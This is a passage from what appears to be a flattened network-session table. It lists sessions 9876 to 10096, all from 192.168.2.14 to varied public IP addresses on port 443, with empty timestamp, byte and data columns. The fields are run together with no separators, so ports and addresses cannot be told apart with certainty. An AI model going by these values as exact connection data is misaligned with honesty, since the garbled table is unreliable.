                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9876192.168.2.1437252158.168.100.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9877192.168.2.143925890.251.139.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9878192.168.2.1445788116.155.106.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9879192.168.2.145458681.35.10.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9880192.168.2.1436364163.128.164.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9881192.168.2.145282454.4.110.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9882192.168.2.1459128121.185.60.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9883192.168.2.1455728186.248.130.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9884192.168.2.1460392113.10.73.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9885192.168.2.1448384124.132.104.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9886192.168.2.1453344210.169.191.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9887192.168.2.1451880159.2.14.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9888192.168.2.144970883.8.214.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9889192.168.2.145956096.189.14.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9890192.168.2.145148863.102.0.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9891192.168.2.1433836163.199.116.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9892192.168.2.1445664207.16.3.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9893192.168.2.143873278.248.72.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9894192.168.2.1450870116.88.195.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9895192.168.2.145404281.206.206.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9896192.168.2.1444666129.243.205.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9897192.168.2.1438680157.141.113.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9898192.168.2.1438106162.60.177.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9899192.168.2.1460476173.251.157.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9900192.168.2.1453758109.115.186.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9901192.168.2.1443158162.203.136.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9902192.168.2.143929027.127.147.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9903192.168.2.1436458217.78.84.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9904192.168.2.1437696220.142.70.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9905192.168.2.1442790182.217.247.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9906192.168.2.1453236201.137.96.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9907192.168.2.1436178130.5.160.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9908192.168.2.144102088.228.210.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9909192.168.2.144655469.233.168.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9910192.168.2.1440064188.193.93.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9911192.168.2.1444940186.248.238.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9912192.168.2.14402244.6.78.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9913192.168.2.1442170159.251.9.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9914192.168.2.1458502186.155.50.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9915192.168.2.1444846117.208.241.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9916192.168.2.1442434108.117.168.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9917192.168.2.1460492157.107.102.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9918192.168.2.1438910163.79.201.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9919192.168.2.1452436195.182.182.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9920192.168.2.143325838.5.242.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9921192.168.2.1449268133.190.158.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9922192.168.2.1435754199.18.242.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9923192.168.2.145128657.245.161.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9924192.168.2.145189482.160.157.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9925192.168.2.1460008171.18.245.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9926192.168.2.144250638.236.218.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9927192.168.2.145369414.72.146.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9928192.168.2.143297897.106.93.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9929192.168.2.143917450.58.65.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9930192.168.2.1445002102.15.135.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9931192.168.2.1444592169.22.147.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9932192.168.2.1444732115.207.133.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9933192.168.2.1433426189.79.185.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9934192.168.2.1435344145.53.84.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9935192.168.2.1441650108.209.217.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9936192.168.2.1458428166.153.165.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9937192.168.2.1455024190.42.118.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9938192.168.2.145818846.28.22.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9939192.168.2.1458558194.227.215.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9940192.168.2.1460996182.116.235.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9941192.168.2.145681612.167.42.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9942192.168.2.1452806146.69.162.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9943192.168.2.143888087.43.160.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9944192.168.2.144590887.108.96.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9945192.168.2.1457518201.0.44.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9946192.168.2.145168287.42.194.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9947192.168.2.1445796217.140.55.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9948192.168.2.143837612.125.51.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9949192.168.2.144753844.164.136.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9950192.168.2.145601662.111.67.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9951192.168.2.1433612141.122.90.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9952192.168.2.145348839.2.14.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9953192.168.2.1456132178.45.134.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9954192.168.2.144798892.243.54.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9955192.168.2.1438384177.134.67.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9956192.168.2.1458210100.167.212.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9957192.168.2.1443458212.246.150.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9958192.168.2.1434688218.25.121.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9959192.168.2.1446082178.183.204.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9960192.168.2.145228046.167.134.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9961192.168.2.145574685.233.253.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9962192.168.2.1451092222.185.210.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9963192.168.2.143411614.197.87.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9964192.168.2.143788288.139.121.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9965192.168.2.1456838181.168.220.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9966192.168.2.1444252103.49.165.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9967192.168.2.1447038158.111.190.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9968192.168.2.1459588207.153.151.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9969192.168.2.1442904148.22.216.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9970192.168.2.144922894.147.49.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9971192.168.2.145824238.78.179.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9972192.168.2.1441702183.239.58.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9973192.168.2.1442306152.159.253.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9974192.168.2.14547828.106.118.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9975192.168.2.1453376144.25.32.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9976192.168.2.1444110156.132.75.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9977192.168.2.144354440.200.52.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9978192.168.2.143360262.103.67.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9979192.168.2.1434646142.11.248.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9980192.168.2.144902866.227.58.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9981192.168.2.143854014.38.176.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9982192.168.2.1435320184.75.4.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9983192.168.2.1440142158.149.12.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9984192.168.2.1459420109.181.8.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9985192.168.2.1437350163.230.164.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9986192.168.2.146037234.14.83.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9987192.168.2.145153484.187.233.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9988192.168.2.1445132182.90.159.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9989192.168.2.1448462129.13.7.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9990192.168.2.143355431.231.221.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9991192.168.2.143650878.212.58.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9992192.168.2.1449462132.21.173.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9993192.168.2.1460972163.207.6.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9994192.168.2.1457196135.69.176.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9995192.168.2.146069874.194.205.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9996192.168.2.1454064202.206.144.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9997192.168.2.1438222188.119.44.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9998192.168.2.1449384124.20.229.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9999192.168.2.1445268171.252.51.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10000192.168.2.1435560182.40.14.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10001192.168.2.1456882120.164.204.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10002192.168.2.143727612.171.212.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10003192.168.2.144789287.124.58.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10004192.168.2.144057263.10.119.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10005192.168.2.144906892.95.240.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10006192.168.2.1455030132.236.10.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10007192.168.2.144848079.121.60.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10008192.168.2.1438050162.12.90.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10009192.168.2.144979687.20.63.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10010192.168.2.1454188207.137.115.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10011192.168.2.144215063.189.95.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10012192.168.2.1435208170.255.219.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10013192.168.2.144422017.253.102.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10014192.168.2.1459056194.134.240.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10015192.168.2.144013060.31.152.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10016192.168.2.144712624.89.187.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10017192.168.2.1459914165.128.8.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10018192.168.2.1454008154.216.138.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10019192.168.2.1434628184.7.103.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10020192.168.2.143854260.246.199.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10021192.168.2.1437884173.16.236.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10022192.168.2.1450038199.169.220.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10023192.168.2.1442858138.205.106.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10024192.168.2.1443550180.73.147.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10025192.168.2.146010283.173.241.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10026192.168.2.1453830134.223.192.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10027192.168.2.1437424213.39.183.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10028192.168.2.1439860183.90.237.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10029192.168.2.143831648.91.112.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10030192.168.2.1450076158.202.52.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10031192.168.2.1445256203.248.1.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10032192.168.2.1435110219.157.104.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10033192.168.2.1454648170.171.220.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10034192.168.2.143472425.199.215.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10035192.168.2.1437540108.180.30.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10036192.168.2.145116612.207.142.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10037192.168.2.1445008153.102.182.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10038192.168.2.1445250102.120.117.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10039192.168.2.1446018157.55.216.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10040192.168.2.1441864208.200.240.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10041192.168.2.145054041.62.147.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10042192.168.2.1435182204.140.184.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10043192.168.2.1446610223.214.172.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10044192.168.2.144918661.190.51.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10045192.168.2.144753880.183.129.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10046192.168.2.145305045.191.63.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10047192.168.2.1439138139.221.15.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10048192.168.2.1453936165.13.70.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10049192.168.2.144706660.218.192.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10050192.168.2.145277086.147.103.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10051192.168.2.143531488.78.161.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10052192.168.2.1436018102.136.239.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10053192.168.2.1437684103.170.125.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10054192.168.2.145853424.59.0.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10055192.168.2.145104888.161.116.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10056192.168.2.1440056195.213.77.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10057192.168.2.1447812170.109.49.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10058192.168.2.143718883.207.171.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10059192.168.2.1453948219.93.173.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10060192.168.2.144113260.88.7.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10061192.168.2.1458532211.214.174.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10062192.168.2.1447134212.165.85.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10063192.168.2.1439030202.118.6.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10064192.168.2.144510852.139.90.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10065192.168.2.1452950170.60.196.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10066192.168.2.1455626134.235.166.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10067192.168.2.1449012148.79.73.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10068192.168.2.1433966123.160.10.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10069192.168.2.1452928170.253.182.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10070192.168.2.1446680197.129.178.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10071192.168.2.1434076123.206.162.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10072192.168.2.144432837.14.131.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10073192.168.2.1444570203.10.48.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10074192.168.2.1441796118.67.97.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10075192.168.2.1441824177.231.76.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10076192.168.2.1449330173.95.134.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10077192.168.2.145635218.159.23.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10078192.168.2.145659459.106.19.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10079192.168.2.145302897.110.37.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10080192.168.2.1434820187.209.200.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10081192.168.2.1442214169.94.69.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10082192.168.2.1447702199.5.148.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10083192.168.2.1437602119.140.35.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10084192.168.2.1439342171.162.2.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10085192.168.2.1442840216.34.219.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10086192.168.2.1434324147.114.83.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10087192.168.2.1435092113.127.3.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10088192.168.2.145052091.171.188.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10089192.168.2.143555073.13.39.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10090192.168.2.1438386107.161.68.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10091192.168.2.143758686.26.171.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10092192.168.2.1457540131.234.167.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10093192.168.2.144816653.210.31.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10094192.168.2.1458736213.225.239.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10095192.168.2.145359212.183.120.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10096192.168.2.143626894.8.177.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
